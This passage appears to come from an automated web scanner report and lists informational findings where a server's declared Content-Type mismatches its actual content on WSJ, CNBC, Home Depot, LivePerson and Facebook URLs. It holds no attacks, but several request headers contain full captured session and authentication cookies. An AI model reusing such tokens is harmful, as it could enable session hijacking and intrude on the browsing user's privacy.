P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 924
Content-Type: text/html; charset=UTF-8

<ul class="local-info">
<li class="location"><a id="w_location" href="http://online.wsj.com/public/page/accuweather-detailed-forecast.html?name=New York, NY&location=10005&u=http%3A//www.accuweathe
...[SNIP]...

24.20. http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://online.wsj.com
Path:	/public/resources/live/2_3001_HP_JSON.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

Response

24.21. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

24.22. http://s.wsj.net/public/resources/documents/ac_keyword_exception_list.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s.wsj.net
Path:	/public/resources/documents/ac_keyword_exception_list.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /public/resources/documents/ac_keyword_exception_list.js HTTP/1.1
Host: s.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 27 Jan 2010 23:55:46 GMT
Vary: Accept-Encoding
Server: Apache
Accept-Ranges: bytes
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 267
Cache-Control: max-age=9216
Expires: Thu, 16 Jun 2011 13:57:59 GMT
Date: Thu, 16 Jun 2011 11:24:23 GMT
Connection: close

keywordException = new Array
("obama","putin","china","fbi","cia","fda","nano","g20","g-20","bay","egan","acme","gold","cost","gas","beer","drug","oil","dog","cpi","gdp","dna","etf","jazz","etfs"
...[SNIP]...

24.23. http://sales.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=55601019 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85815EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; HumanClickACTIVE=1308227834170

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=55601019
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2409"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 17 Jun 2011 10:42:56 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

24.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

24.25. http://sr2.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sr2.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=57386690 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=57386690
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2313"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17291
Date: Thu, 16 Jun 2011 11:29:07 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

24.26. http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://switch.atdmt.com
Path:	/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.27. http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://switch.atdmt.com
Path:	/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.28. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

24.29. http://www.cnbc.com/default.ashx/id/23149822 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cnbc.com
Path:	/default.ashx/id/23149822

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /default.ashx/id/23149822 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OREF=http://cnbc.com/; TZM=-300; s_cc=true; adops_master_kvs=; s_nr=1308223495405; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/43418837%2526ot%253DA; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc8sw%2fTFdw%2bInzeR9sZPbv%2bo3FyKYrs13BFSjxnaXOY7w%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3WnOxiikPL+c=; cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbR05vbq%2fTokqT%2bGx%2fsrPQZzaMkoytxM7f0miPeiNE4Qig%3d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:24:53 GMT
Via: 1.1 C aicache6
Content-Length: 72260
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 11:24:59 GMT

/*
* jQuery JavaScript Library v1.4.2
* Copyright 2010, John Resig, http://jquery.com/
* Distributed in whole under the terms of the MIT license
* http://www.opensource.org/licenses/mit-license.php
*
...[SNIP]...

24.30. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b7605c34%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4c442e74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15517a6c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df359db8bbc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df219fe1adc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5d539448&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.69.50
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:04 GMT
Content-Length: 22

Invalid Application ID

24.31. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/businessControlledFragments/htmls/TypeAhead-min.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /businessControlledFragments/htmls/TypeAhead-min.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 11 May 2011 02:05:14 GMT
ETag: "15850c-2d65-80d5ea80"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 11621
Cache-Control: max-age=21113
Date: Thu, 16 Jun 2011 11:27:00 GMT
Connection: close

dojo.require("dojo.string");
function TypeAhead(opts)
{
var defaultOpts = {
searchBox: '',
resultsDiv: document.getElementById('typeahead'),
dbObject: 'ta_data',
db
...[SNIP]...

24.32. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/baseline.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/baseline.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/baseline.json HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Fri, 04 Feb 2011 04:18:56 GMT
ETag: "254128-1df2-2e37ec00"
Accept-Ranges: bytes
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 7666
Cache-Control: max-age=21254
Date: Thu, 16 Jun 2011 11:26:45 GMT
Connection: close

// ******* Brightcove Functions *********
// *******updated with NEW DYNAMIC POPUP FUNCTION 27-Dec-10 *****
playerName = "player1";
isPlayerAdded = false;

var tabNum = 0;
var timer;
var idleTimer;
va
...[SNIP]...

24.33. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/arrow_cta.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /wcsstore/hdus/en_US/images/layout/arrow_cta.png HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556319&langId=-1&catalogId=10053&cm_sp=outdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers&locStoreNum=2583
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; FSRCookie=ForeseeLoyalty=2; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; THD_PERSIST=C4%3D2583%2BNE%20Washington%20DC%20-%20%20Washington%2C%20DC%2B43%3A%3BC4_EXP%3D1360063600%3A%3BC5%3D7000000000002025830%3A%3BC5_EXP%3D1360063600%3A%3BC8%3D%3A%3BC8_EXP%3D1308310168%3A%3BC24%3D20018%3A%3BC24_EXP%3D1360063600%3A%3BC25%3Dccaita67%2FWC_THD2_ccaita67%2F1308223765492%3A%3BC25_EXP%3D1360063765%3A%3BC27%3D2583%2BNE%20Washington%20DC%20-%20%20Washington%2C%20DC%2B43%3A%3BC27_EXP%3D1360063600%3A%3BC33%3D2583%3A%3BC33_EXP%3D1360063600%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D1308310000; s_pers=%20s_campaign%3Dno%2520value%7C1308225568985%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225568988%3B%20p_30%3DSubcategory%7C1308225568991%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 19 May 2010 16:11:09 GMT
ETag: "184248-36-b4b8e140"
Accept-Ranges: bytes
Content-Length: 54
Content-Type: image/png
Cache-Control: max-age=21019
Date: Thu, 16 Jun 2011 11:29:31 GMT
Connection: close

GIF89a.. ......(...!.......,...... ..........bq.%_(.;

24.34. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/images/layout/clear.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /wcsstore/hdus/en_US/images/layout/clear.png HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; 40M3=CT-1; s_pers=%20s_campaign%3Dno%2520value%7C1308225421778%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Ewalk%2520behind%2520mowers%7C1308225421780%3B%20p_30%3DSubcategory%7C1308225421782%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
